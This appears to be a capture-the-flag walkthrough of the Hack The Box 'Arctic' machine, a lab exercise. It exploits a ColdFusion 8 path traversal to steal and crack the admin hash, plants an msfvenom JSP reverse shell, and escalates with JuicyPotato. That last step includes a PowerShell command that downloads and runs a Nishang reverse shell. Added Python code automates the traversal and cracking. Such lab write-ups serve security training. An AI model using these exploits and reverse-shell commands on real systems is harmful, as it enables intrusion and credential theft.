This is a walkthrough of the Arctic box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:
./nmapAutomator.sh 10.10.10.11 All
- All = runs every scan type consecutively (quick, basic, UDP, full port range, vulns)
- Note: The full run took about 15 minutes for me, but the quick scan results come back within the first few seconds, so you can start poking at those ports while the rest completes. In this case the scans themselves turned up nothing beyond the three open ports; the useful information came from browsing port 8500 by hand. Keep that in mind when you allocate your time.
Here are the results that come back:
root@kali:/home/churr0s/Scripts/nmapAutomator# ./nmapAutomator.sh 10.10.10.11 All
Running all scans on 10.10.10.11
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:27 PDT
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:27 PDT
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.33 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:29 PDT
Nmap scan report for 10.10.10.11
Host is up.
All 1000 scanned ports on 10.10.10.11 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.84 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:32 PDT
Initiating Parallel DNS resolution of 1 host. at 19:32
Completed Parallel DNS resolution of 1 host. at 19:32, 0.06s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 10.10.10.11 [65535 ports]
Discovered open port 135/tcp on 10.10.10.11
Discovered open port 8500/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 10.46% done; ETC: 19:37 (0:04:25 remaining)
SYN Stealth Scan Timing: About 22.98% done; ETC: 19:37 (0:03:24 remaining)
SYN Stealth Scan Timing: About 34.41% done; ETC: 19:37 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.58% done; ETC: 19:37 (0:02:24 remaining)
Discovered open port 49154/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 57.27% done; ETC: 19:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.69% done; ETC: 19:37 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.12% done; ETC: 19:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 19:37, 263.23s elapsed (65535 total ports)
Nmap scan report for 10.10.10.11
Host is up (0.094s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 263.38 seconds
Raw packets sent: 131257 (5.775MB) | Rcvd: 193 (8.492KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:37 PDT
Nmap scan report for 10.10.10.11
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.27 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 19:39 PDT
Nmap scan report for 10.10.10.11
Host is up (0.090s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8500/tcp open fmtp?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.99 seconds
---------------------Recon Recommendations----------------------
---------------------Finished all Nmap scans---------------------
Completed in 14 minute(s) and 45 second(s)
Our findings:
- Ports 135 and 49154: Microsoft Windows RPC (135 is the endpoint mapper, 49154 one of the dynamic RPC ports)
- Port 8500: nmap prints "fmtp" only because that is what its services file lists for 8500; version detection could not identify the service (hence the "?"), so it needs a manual look. 8500 is also the default port of the web server bundled with Adobe ColdFusion.
- UDP: all 1000 probed ports came back open|filtered, i.e. no reply at all, so nothing usable there
- The vuln scripts produced nothing (the clamav-exec lines are the script failing, not a finding), and there were no directory or HTTP results because nmap never recognised 8500 as HTTP
2. Enumeration
Let's try to pull up port 8500 in a web browser (http://10.10.10.11:8500/). We get a directory listing with links for /cfdocs and /CFIDE, so this is a web server after all, and the CFIDE directory (ColdFusion's administrator tree) tells us which one.
Clicking /CFIDE gives another directory listing. The server is very slow: each request takes about 30 seconds to come back, so keep that in mind for everything that follows (any brute force against this host would be painfully slow).
There is a link called administrator, and anything called "administrator" is worth checking out. It leads to an Adobe ColdFusion 8 login page with the username "admin" already filled in.
Some googling reveals that Adobe ColdFusion 8 has a directory traversal vulnerability in the administrator console (CVE-2010-2861, Adobe bulletin APSB10-18): the locale parameter of enter.cfm is used to build a file path without sanitisation, so it can be pointed at the internal password.properties file, which holds the SHA-1 hash of the admin password. The published PoC looks like this:
http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
Here is my final edit. The backslashes did not work for me until I swapped them for forward slashes; the %00 (null byte) truncates the path so that whatever the application appends after the locale is ignored:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
3. Initial foothold
I pasted the URL into my browser and the administrator login page came up again, but this time with the contents of password.properties, including the password hash, echoed onto the page:
Now take that hash and run it through hashid (a tool that comes with Kali) to see what type of hash it might be:
It is a 40-character hex string, most likely SHA-1, and that can be cracked with hashcat:
hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt --force
- hash.txt is the input file with my hash. I copied the hash from the browser and saved it in this text file, one hash per line, which hashcat reads and tries to crack
- /usr/share/wordlists/rockyou.txt is the wordlist that comes with Kali (on a fresh install it may still be rockyou.txt.gz and need a gunzip first). Hashcat tries every entry in it
- -m 100 selects the hash mode; 100 is plain SHA-1
- --force makes hashcat ignore warnings (typically about the OpenCL runtime inside a VM). It isn't needed on a properly set-up host and can hide real problems, so only add it if hashcat refuses to start without it
The result is the password "happyday". Back at the administrator login page, admin / happyday logs us in.
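The offline half of this step, as an added example that is not code from the original walkthrough: it builds the CVE-2010-2861 traversal URL the way the working request above does, pulls the password= line out of the page the server echoes back, and runs the same SHA-1 dictionary attack that hashcat -m 100 performs. The host and port, the traversal depth, the layout of the constructed password.properties sample and the tiny wordlist are all my assumptions, not captures from the box.

```python
# Added example, not part of the original walkthrough.
# Builds the CVE-2010-2861 (APSB10-18) traversal URL, extracts the SHA-1 the
# admin console echoes back, and cracks it with a wordlist (hashcat -m 100).
import hashlib
import re

CF_ENTER = "/CFIDE/administrator/enter.cfm"
PASSWORD_FILE = "ColdFusion8/lib/password.properties"  # assumed install root


def build_locale_traversal_url(base, depth=10, target=PASSWORD_FILE):
    """Abuse the unsanitised `locale` parameter of enter.cfm.

    `depth` leading ../ climb out of the locale directory to the drive root;
    %00 truncates the path at the file we want, so whatever the application
    appends after the locale (the walkthrough sends `en`) never reaches the
    file open. Slashes and the NUL are left literal on purpose: that is the
    form that worked against the box.
    """
    traversal = "../" * depth + target
    return f"{base}{CF_ENTER}?locale={traversal}%00en"


PASSWORD_LINE = re.compile(r"^password=([0-9A-Fa-f]{40})\s*$", re.MULTILINE)


def extract_password_hash(body):
    """Return the 40-hex-digit SHA-1 from the echoed properties file, or None."""
    m = PASSWORD_LINE.search(body)
    return m.group(1).upper() if m else None


def sha1_hex(word):
    """ColdFusion 8 stores the admin password as uppercase hex SHA-1."""
    return hashlib.sha1(word.encode()).hexdigest().upper()


def crack_sha1(target_hash, wordlist):
    """Offline equivalent of `hashcat -m 100 hash.txt wordlist`."""
    target = target_hash.strip().upper()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if sha1_hex(candidate) == target:
            return candidate
    return None


# Constructed stand-in for the page the admin console returned once the
# traversal worked: login page HTML with the properties file dumped into it.
# The hash line is generated from the known password so the sample stays
# self-consistent; it is not a capture from the box.
SAMPLE_BODY = (
    "<html><head><title>ColdFusion Administrator Login</title></head><body>\n"
    "#constructed sample of password.properties\n"
    f"password={sha1_hex('happyday')}\n"
    "encrypted=true\n"
    "</body></html>\n"
)

# Constructed mini wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "coldfusion", "happyday", "letmein"]


def recover_admin_password(body, wordlist):
    """End-to-end: hash out of the response, then dictionary attack."""
    digest = extract_password_hash(body)
    if digest is None:
        return None
    return crack_sha1(digest, wordlist)


if __name__ == "__main__":
    print(build_locale_traversal_url("http://10.10.10.11:8500"))
    print("hash:", extract_password_hash(SAMPLE_BODY))
    print("password:", recover_admin_password(SAMPLE_BODY, SAMPLE_WORDLIST))
```

Against the real box you would fetch the URL with a browser or curl (remember the 30-second response time) and feed the HTML into extract_password_hash; the crack function is there to make the SHA-1 mode choice concrete, rockyou is far too large to loop over in Python and hashcat remains the right tool for the actual run.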
In the left menu, Debugging & Logging > Scheduled Tasks lets us schedule tasks. A task fetches a URL we specify and, with output saving enabled, writes the response to a file path we choose on the server.
ColdFusion serves *.cfm pages, and because ColdFusion 8 runs on top of JRun (a J2EE server) it also executes JSP files dropped into the webroot. So let's create a JSP reverse shell with msfvenom and point the scheduled task at it:
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.2 lport=4444 -f raw > shell.jsp
Now that we have the payload, we need to host it somewhere the scheduled task can reach over HTTP. The task will download it from that URL and save it to the file path we give it on the victim.
Let’s set up an HTTP server on our side first:
And open a listener on our side as well, so when the reverse shell payload is executed, it will connect back to our listener:
nc -lvnp 4444
- port 4444 is the same port I used when I generated the payload with msfvenom
Now we fill out the scheduled task form. For the URL we use our own HTTP server, since that is where shell.jsp is hosted. For the "File" field we need the exact folder the web server serves documents from. Under Server Settings > Mappings, CFIDE maps to C:\ColdFusion8\wwwroot\CFIDE. So we tell the scheduled task to write the download to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp, and we can then trigger the payload by requesting http://10.10.10.11:8500/CFIDE/shell.jsp
Let’s fill out this form now (time doesn’t matter because we are going to run the task manually):
After you hit submit, you should see the scheduled task in the task list. The green icon on the far left will run the task manually. Go ahead and hit that button.
Then in your browser, visit http://10.10.10.11:8500/CFIDE/shell.jsp and if you go back to your listener, you should now see a reverse shell has been spawned:
Running whoami tells us we are the user "tolis", and we can grab their user flag:
However, this is an unprivileged user, not SYSTEM, so we need to escalate privileges.
4. Privilege escalation
Let’s first run systeminfo and whoami /all to enumerate a bit more:
The results show that the victim is a 64-bit Windows Server 2008 R2 system with no hotfixes applied, which is good for us: many privilege escalation exploits for 2008 R2 should still work. whoami /all also shows "SeImpersonatePrivilege" enabled, which is exactly the privilege JuicyPotato abuses (it coerces a SYSTEM authentication over DCOM and impersonates the resulting token). JuicyPotato works on 2008 R2; it stopped working on Windows 10 1809 / Server 2019 and later, where other Potato variants are needed.
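A triage helper for this enumeration step, added here as an example and not part of the original walkthrough: it parses whoami /priv and systeminfo output and reports whether the JuicyPotato prerequisites hold (an impersonation privilege enabled, and an OS build older than Windows 10 1809 / Server 2019, build 17763, where the DCOM behaviour the tool relies on changed). The whoami and systeminfo samples are constructed to match the real commands' column layout; they are not captures from the box.

```python
# Added example, not part of the original walkthrough.
# Checks the JuicyPotato prerequisites from `whoami /priv` and `systeminfo`.
import re

# Privileges that let a process use a SYSTEM token obtained from a coerced
# local authentication (the RottenPotato/JuicyPotato prerequisite).
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Windows 10 1809 / Server 2019 (build 17763) changed the DCOM/OXID resolver
# behaviour JuicyPotato depends on; newer builds need another Potato variant.
JUICY_POTATO_MAX_BUILD = 17762

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.MULTILINE)
BUILD_RE = re.compile(r"^OS Version:.*\bBuild (\d+)", re.MULTILINE)
SYSTYPE_RE = re.compile(r"^System Type:\s*(.+?)\s*$", re.MULTILINE)


def parse_whoami_priv(text):
    """Return {privilege_name: True if Enabled} from `whoami /priv` output."""
    return {name: state == "Enabled" for name, state in PRIV_LINE.findall(text)}


def potato_candidates(text):
    """Enabled privileges that make a Potato-style escalation viable."""
    privs = parse_whoami_priv(text)
    return sorted(p for p, on in privs.items() if on and p in POTATO_PRIVS)


def os_build(systeminfo_text):
    """Windows build number from the `OS Version:` line, or None."""
    m = BUILD_RE.search(systeminfo_text)
    return int(m.group(1)) if m else None


def binary_arch(systeminfo_text):
    """Which JuicyPotato build to bring over: x64 or x86."""
    m = SYSTYPE_RE.search(systeminfo_text)
    return "x64" if m and "x64" in m.group(1) else "x86"


def juicy_potato_viable(whoami_text, systeminfo_text):
    """(viable?, reasons) for running JuicyPotato on this host."""
    reasons = []
    privs = potato_candidates(whoami_text)
    if not privs:
        reasons.append("neither SeImpersonatePrivilege nor "
                       "SeAssignPrimaryTokenPrivilege is enabled")
    build = os_build(systeminfo_text)
    if build is None:
        reasons.append("could not read the OS build from systeminfo")
    elif build > JUICY_POTATO_MAX_BUILD:
        reasons.append(f"build {build} is 1809/2019 or later; "
                       "JuicyPotato's DCOM trick no longer works there")
    if reasons:
        return False, reasons
    return True, [f"{', '.join(privs)} enabled on build {build}; "
                  f"use the {binary_arch(systeminfo_text)} binary"]


# Constructed sample output, laid out like the real commands print it.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

if __name__ == "__main__":
    ok, why = juicy_potato_viable(SAMPLE_WHOAMI_PRIV, SAMPLE_SYSTEMINFO)
    print("JuicyPotato viable:", ok)
    for line in why:
        print(" -", line)
```

Paste the real command output into the two sample strings (or read it from files) and the verdict tells you whether to spend time on JuicyPotato or move on to another escalation path; the build check is what saves you on a 2019 box that still shows SeImpersonatePrivilege enabled.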
JUICY POTATO STEPS
1. Download the JuicyPotato executable from its GitHub repo (the releases link on the right, "fresh potatoes", has the latest .exe)
2. Copy that executable into your present working directory (I renamed mine "jp.exe" when I copied it over)
3. Make sure you also have Nishang, and copy its Invoke-PowerShellTcp.ps1 reverse shell script into the same directory (I renamed mine nishang_revshell.ps1)
4. Edit nishang_revshell.ps1 and add this line at the very end, so the function is called as soon as the script is loaded:
- Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 7600
5. Stand up an SMB server with Impacket's smbserver.py (Kali ships Impacket; the script is also installed as impacket-smbserver), sharing the directory that holds jp.exe
- arctictemp is the share name
- I shared everything in /home/churr0s/Documents/HTB/arctic/ for the victim box to grab
6. Create a temp folder on the victim box where you can write and execute files, and cd into it
7. Copy the JuicyPotato executable from the share into that folder (with no destination given, copy drops it in the current directory):
- copy \\10.10.14.2\arctictemp\jp.exe
8. Open a second listener on our side to catch the new reverse shell JuicyPotato will spawn. I used the same port I put into the Nishang script (7600):
- nc -nlvp 7600
9. On the victim box, run:
- jp.exe -l 1337 -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -t * -a "-c IEX(new-object net.webclient).downloadstring('http://10.10.14.2/nishang_revshell.ps1')" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
- -l 1337 is the local port JuicyPotato's COM server listens on; -p is the program to launch as SYSTEM (PowerShell) and -a its arguments, which download the Nishang script from our HTTP server (still running from the earlier step, serving the directory that now holds nishang_revshell.ps1) and execute it in memory; -t * tries both CreateProcessWithToken and CreateProcessAsUser
- -c is the CLSID of a DCOM server that runs as SYSTEM. JuicyPotato needs one that matches the victim OS (according to the repo), so check the CLSID list there, pick the victim OS (in our case 2008 R2) and try one. The second one in the list worked for me: {e60687f7-01a1-40aa-86ac-db1cbf673334}
Back on the port 7600 listener, a new reverse shell has arrived:
Run whoami and we are NT AUTHORITY\SYSTEM! Time to grab the root flag: